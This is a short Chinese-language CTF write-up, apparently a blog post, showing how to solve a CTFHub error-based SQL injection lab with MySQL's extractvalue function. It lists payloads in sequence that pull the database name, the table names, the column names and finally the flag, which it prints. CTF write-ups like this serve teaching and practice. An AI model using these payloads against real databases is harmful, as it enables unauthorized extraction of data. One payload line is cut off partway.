本文介绍了如何利用SQL的Extractvalue函数进行报错注入,详细讲解了从查询数据库名称、表名到字段名的过程,并最终揭示了flag。通过这个过程,读者可以深入理解SQL报错注入的原理。
使用Extractvalue函数进行报错注入:
首先,Extractvalue函数对于“~”不能识别,“~”的ASCII码对应的是0x7e。
1.查询数据库名称
id=1 and extractv
1 and extractvalue(1,concat(0x7e,(select database())))
得到 数据库名称:sqli
2.查询表名
1 union select 1,extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="sqli")))
3.查询字段名
id=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="flag")))
4.flag
id=1 and extractvalue(1,concat(0x7e,(select flag from sqli.flag)))
补上}就搞定=)
ctfhub{d0725f6223ab8d3048eeeb81}
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
